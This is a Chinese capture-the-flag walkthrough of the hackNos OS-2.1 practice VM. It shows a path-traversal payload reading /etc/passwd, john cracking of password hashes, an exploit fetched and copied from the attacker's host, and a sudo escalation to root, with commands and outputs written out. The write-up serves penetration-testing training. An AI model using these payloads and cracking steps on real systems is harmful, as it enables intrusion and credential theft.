OS-HACKNOS-2.1
作者:互联网
OS-HACKNOS-2.1
目录1 信息收集
1.1 端口扫描
$ nmap -A -p - -T4 192.168.56.103 -oA OS-HACKNOS-2.1
Nmap scan report for 192.168.56.103
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
| 256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_ 256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2 后台目录扫描
$ dirsearch -x403 -u http://192.168.56.103/
Target: http://192.168.56.103/
[22:21:48] Starting:
[22:22:16] 200 - 11KB - /index.html
[22:22:34] 301 - 316B - /tsweb -> http://192.168.56.103/tsweb/
[22:22:35] 200 - 43KB - /tsweb/
Task Completed
# /tsweb/目录扫描
$ dirsearch -u http://192.168.56.103/tsweb/
Target: http://192.168.56.103/tsweb/
[22:35:36] Starting:
[22:35:51] 301 - 0B - /tsweb/index.php -> http://192.168.56.103/tsweb/
[22:35:52] 200 - 19KB - /tsweb/license.txt
[22:35:57] 200 - 7KB - /tsweb/readme.html
[22:36:03] 301 - 325B - /tsweb/wp-admin -> http://192.168.56.103/tsweb/wp-admin/
[22:36:03] 400 - 1B - /tsweb/wp-admin/admin-ajax.php
[22:36:03] 302 - 0B - /tsweb/wp-admin/ -> http://192.168.56.103/tsweb/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.103%2Ftsweb%2Fwp-admin%2F&reauth=1
[22:36:03] 500 - 3KB - /tsweb/wp-admin/setup-config.php
[22:36:03] 301 - 327B - /tsweb/wp-content -> http://192.168.56.103/tsweb/wp-content/
[22:36:03] 200 - 0B - /tsweb/wp-config.php
[22:36:03] 200 - 1KB - /tsweb/wp-admin/install.php
[22:36:03] 200 - 0B - /tsweb/wp-content/
[22:36:03] 200 - 69B - /tsweb/wp-content/plugins/akismet/akismet.php
[22:36:03] 500 - 0B - /tsweb/wp-content/plugins/hello.php
[22:36:03] 200 - 1KB - /tsweb/wp-content/uploads/
[22:36:03] 200 - 796B - /tsweb/wp-content/upgrade/
[22:36:03] 301 - 328B - /tsweb/wp-includes -> http://192.168.56.103/tsweb/wp-includes/
[22:36:03] 200 - 0B - /tsweb/wp-cron.php
[22:36:03] 500 - 0B - /tsweb/wp-includes/rss-functions.php
[22:36:03] 302 - 0B - /tsweb/wp-signup.php -> http://192.168.56.103/tsweb/wp-login.php?action=register
[22:36:03] 200 - 6KB - /tsweb/wp-login.php
[22:36:03] 200 - 45KB - /tsweb/wp-includes/
[22:36:04] 405 - 42B - /tsweb/xmlrpc.php
Task Completed
1.2.1 目录分析
-
http://192.168.56.103/tsweb/
1.2.2 WPScan扫描
$ wpscan --url http://192.168.56.103/tsweb/ -e vp --api-token Yourapi
| [!] 1 vulnerability identified:
|
| [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
| - https://www.exploit-db.com/exploits/46537/
| - https://seclists.org/fulldisclosure/2019/Mar/26
- 根据扫描结果发现目标系统使用的WP插件存在本地文件包含漏洞
2 WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion利用
-
Local File Inclusion POC: GET /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
-
访问
http://192.168.56.103/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
验证漏洞得到flag:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
2.1 爆破flag用户的密码
$ cat passwd
$1$flag$vqjCxzjtRc7PofLYS2lWf/
$ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
topsecret (?)
2.2 GetShell
# 使用flag:topsecret成功登录系统
$ ssh flag@192.168.56.103
flag@hacknos:/$
2.3 切换Python Shell
python3 -c "import pty;pty.spawn('/bin/bash')"
2.4 检测系统是否存在提权漏洞
flag@hacknos:/tmp/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2018-18955] subuid_shell
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
Exposure: probable
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
Comments: CONFIG_USER_NS needs to be enabled
3 提权
3.1 尝试利用CVE-2018-18955提权
-
下载exp:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
-
kali编译exp:
$ gcc subshell.c -o subshell $ gcc subuid_shell.c -o subuid_shell
-
上传exp到目标系统
flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subshell . flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subuid_shell .
-
尝试利用exp失败
flag@hacknos:/tmp$ cat /etc/shadow cat: /etc/shadow: Permission denied flag@hacknos:/tmp$ ./subuid_shell newuidmap: uid range [0-1000) -> [100000-101000) not allowed subuid_shell: newuidmap failed flag@hacknos:/tmp$ ./subshell subshell: write uid map: Operation not permitted subshell: read from sock: Success flag@hacknos:/tmp$ id uid=1001(flag) gid=1003(flag) groups=1003(flag)
3.2 收集当前系统信息
-
查看当前系统中的可疑文件
flag@hacknos:/var/backups$ ls apt.extended_states.0 apt.extended_states.1.gz passbkp flag@hacknos:/var/backups$ cat passbkp/md5-hash $1$rohit$01Dl0NQKtgfeL08fGrggi0
-
查看flag用户所创建的文件:没有东东
flag@hacknos:/$ find / -user flag 2>/dev/null | egrep -v "/proc"
-
查看系统所设置的cap权限
flag@hacknos:/$ getcap -r / 2>/dev/null /usr/bin/mtr-packet = cap_net_raw+ep
-
查看当前系统中具有sid权限的命令:没有东东
flag@hacknos:/$ find / -perm -u=s 2>/dev/null
3.3 切换用户
-
爆破flag用户的密码
$ cat passwd $1$rohit$01Dl0NQKtgfeL08fGrggi0 $ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd !%hack41 (?)
-
切换成功
flag@hacknos:/var/www/html/tsweb$ su - rohit Password: rohit@hacknos:~$
-
查看rohit用户的权限
rohit@hacknos:~$ id uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
-
查看rohit用户的sudo权限
rohit@hacknos:~$ sudo -l [sudo] password for rohit: Matching Defaults entries for rohit on hacknos: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User rohit may run the following commands on hacknos: (ALL : ALL) ALL
3.4 提权
rohit@hacknos:~$ sudo -i
root@hacknos:~# cat root.txt
_______ __ __ __ #
/ \ / | / |/ | #
$$$$$$$ | ______ ______ _$$ |_ _$$ |$$ |_ #
$$ |__$$ | / \ / \ / $$ | / $$ $$ | #
$$ $$< /$$$$$$ |/$$$$$$ |$$$$$$/ $$$$$$$$$$/ #
$$$$$$$ |$$ | $$ |$$ | $$ | $$ | __ / $$ $$ | #
$$ | $$ |$$ \__$$ |$$ \__$$ | $$ |/ | $$$$$$$$$$/ #
$$ | $$ |$$ $$/ $$ $$/ $$ $$/ $$ |$$ | #
$$/ $$/ $$$$$$/ $$$$$$/ $$$$/ $$/ $$/ #
#############################################################
#############################################################
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Blog : www.hackNos.com
Author : Rahul Gehlaut
linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
root@hacknos:~#
标签:sbin,tsweb,22,HACKNOS,nologin,flag,usr,2.1,OS 来源: https://www.cnblogs.com/f-carey/p/16098182.html